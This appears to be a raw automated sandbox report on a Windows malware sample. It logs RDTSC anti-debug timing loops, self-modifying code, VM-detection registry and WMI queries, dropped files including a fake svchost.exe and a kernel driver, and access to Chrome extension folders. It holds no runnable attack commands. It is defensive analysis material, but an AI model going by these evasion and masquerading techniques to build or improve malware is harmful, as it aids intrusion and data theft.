Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00D1F second address: 5F00D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00D23 second address: 5F00D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00D35 second address: 5F00D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00D3B second address: 5F00DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F882C2316BFh 0x0000000e jmp 00007F87BC5165C9h 0x00000013 call 00007F882C21DB7Eh 0x00000018 mov edi, edi 0x0000001a push ebp 0x0000001b mov ebp, esp 0x0000001d mov edx, dword ptr fs:[00000018h] 0x00000024 sub esp, 08h 0x00000027 mov eax, dword ptr [edx+00000FDCh] 0x0000002d test eax, eax 0x0000002f jns 00007F87BC5165B4h 0x00000031 add edx, eax 0x00000033 test ecx, ecx 0x00000035 je 00007F87BC5165BEh 0x00000037 cmp ecx, dword ptr [edx+00000840h] 0x0000003d je 00007F87BC51664Fh 0x00000043 mov eax, dword ptr [edx+00000848h] 0x00000049 mov edx, dword ptr [edx+0000084Ch] 0x0000004f mov esp, ebp 0x00000051 pop ebp 0x00000052 ret 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F87BC5165BCh 0x0000005a add ax, A768h 0x0000005f jmp 00007F87BC5165BBh 0x00000064 popfd 0x00000065 mov ecx, 2D08F95Fh 0x0000006a popad 0x0000006b mov ecx, eax 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F87BC5165C1h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00DA1 second address: 5F00E32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or ecx, edx 0x0000000b jmp 00007F87BD02CC8Eh 0x00000010 je 00007F882CD1FDB8h 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F87BD02CC8Eh 0x0000001d and eax, 156DBF58h 0x00000023 jmp 00007F87BD02CC8Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F87BD02CC98h 0x0000002f adc cx, C9B8h 0x00000034 jmp 00007F87BD02CC8Bh 0x00000039 popfd 0x0000003a popad 0x0000003b push 00000001h 0x0000003d pushad 0x0000003e call 00007F87BD02CC94h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00E32 second address: 5F00E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push dword ptr [ebp+14h] 0x00000009 jmp 00007F87BC5165BAh 0x0000000e mov ecx, edi 0x00000010 jmp 00007F87BC5165C0h 0x00000015 xchg eax, edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F87BC5165C7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00E71 second address: 5F00E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00E77 second address: 5F00E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5F00E7B second address: 5F00F0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F87BD02CC99h 0x00000011 xchg eax, edx 0x00000012 jmp 00007F87BD02CC8Eh 0x00000017 mov edx, dword ptr [ebp+10h] 0x0000001a pushad 0x0000001b jmp 00007F87BD02CC8Eh 0x00000020 pushad 0x00000021 mov si, A457h 0x00000025 mov ebx, esi 0x00000027 popad 0x00000028 popad 0x00000029 nop 0x0000002a jmp 00007F87BD02CC96h 0x0000002f push eax 0x00000030 jmp 00007F87BD02CC8Bh 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F87BD02CC95h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0871 second address: 5ED08B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F87BC5165C1h 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F87BC5165BCh 0x00000014 adc cl, 00000018h 0x00000017 jmp 00007F87BC5165BBh 0x0000001c popfd 0x0000001d mov di, si 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ebx, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED08B3 second address: 5ED08B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED08B8 second address: 5ED08D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED08D0 second address: 5ED0937 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, si 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F87BD02CC8Eh 0x00000017 sbb esi, 23236708h 0x0000001d jmp 00007F87BD02CC8Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov dl, ch 0x0000002c jmp 00007F87BD02CC97h 0x00000031 popad 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov di, C0D6h 0x0000003c movsx edx, si 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0937 second address: 5ED095F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0980 second address: 5ED0984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0984 second address: 5ED098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED098A second address: 5ED0990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED021E second address: 5ED0222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0222 second address: 5ED0276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F87BD02CC8Dh 0x00000013 add cl, FFFFFFE6h 0x00000016 jmp 00007F87BD02CC91h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F87BD02CC90h 0x00000022 sbb esi, 3F6C1E88h 0x00000028 jmp 00007F87BD02CC8Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0276 second address: 5ED028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BC5165C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED028E second address: 5ED032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F87BD02CC94h 0x00000014 adc ax, 9348h 0x00000019 jmp 00007F87BD02CC8Bh 0x0000001e popfd 0x0000001f mov dh, ah 0x00000021 popad 0x00000022 push 00000000h 0x00000024 jmp 00007F87BD02CC8Bh 0x00000029 push dword ptr [ebp+0Ch] 0x0000002c jmp 00007F87BD02CC96h 0x00000031 push dword ptr [ebp+10h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007F87BD02CC8Dh 0x0000003c pop ecx 0x0000003d pushfd 0x0000003e jmp 00007F87BD02CC91h 0x00000043 adc ax, 5876h 0x00000048 jmp 00007F87BD02CC91h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0366 second address: 5EE030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F87BC5165C7h 0x00000009 and si, F3BEh 0x0000000e jmp 00007F87BC5165C9h 0x00000013 popfd 0x00000014 jmp 00007F87BC5165C0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushad 0x0000001f call 00007F87BC5165BCh 0x00000024 pop ecx 0x00000025 popad 0x00000026 jmp 00007F87BC5165BEh 0x0000002b popad 0x0000002c retn 000Ch 0x0000002f or eax, eax 0x00000031 jne 00007F87BC5165B7h 0x00000033 mov dword ptr [00403C74h], eax 0x00000038 push eax 0x00000039 push 00000000h 0x0000003b call 00007F87BC516837h 0x00000040 jmp 00007F87C1FF4CBBh 0x00000045 mov edi, edi 0x00000047 jmp 00007F87BC5165C6h 0x0000004c xchg eax, ebp 0x0000004d jmp 00007F87BC5165C0h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F87BC5165BCh 0x0000005c xor esi, 0E970CA8h 0x00000062 jmp 00007F87BC5165BBh 0x00000067 popfd 0x00000068 push ecx 0x00000069 pop edx 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE030E second address: 5EE0348 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F87BD02CC8Ah 0x00000013 or esi, 3F2B3A38h 0x00000019 jmp 00007F87BD02CC8Bh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5EE0348 second address: 5EE0365 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 call 00007F87BC5165C2h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0DE5 second address: 5ED0DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0DEA second address: 5ED0E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e call 00007F87BC5165BCh 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 jmp 00007F87BC5165BDh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0E1E second address: 5ED0E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0E22 second address: 5ED0E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0E26 second address: 5ED0E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\47SXvEQ.exe	RDTSC instruction interceptor: First address: 5ED0E2C second address: 5ED0E49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\47SXvEQ.exe	Special instruction interceptor: First address: EE677B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\47SXvEQ.exe	Special instruction interceptor: First address: 10938C0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\47SXvEQ.exe	Special instruction interceptor: First address: 111F964 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\47SXvEQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\47SXvEQ.exe

Code function: 0_2_05EE0E98 rdtsc

0_2_05EE0E98

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6964	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2852	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5973
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 555
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4935
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1814
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8247
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1116
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4713
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1088

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\svchost.exe	Dropped PE file which has not been started: C:\Windows\Temp\qnibnfgnagzt.sys	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-17263

Source: C:\Users\user\AppData\Local\Temp\Built.exe

API coverage: 4.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep count: 6964 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568	Thread sleep count: 2852 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248	Thread sleep count: 5973 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep count: 555 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep count: 4935 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep count: 402 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796	Thread sleep count: 1814 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep count: 8247 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080	Thread sleep count: 1116 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564	Thread sleep count: 4713 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7564	Thread sleep count: 1088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF6266483B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266492F0 FindFirstFileExW,FindClose,	4_2_00007FF6266492F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 4_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF6266618E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266492F0 FindFirstFileExW,FindClose,	5_2_00007FF6266492F0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF6266618E4
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00007FF6266483B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF10C3229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	5_2_00007FFDF10C3229

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 5_2_00007FFDF150F4C0 GetSystemInfo,

5_2_00007FFDF150F4C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
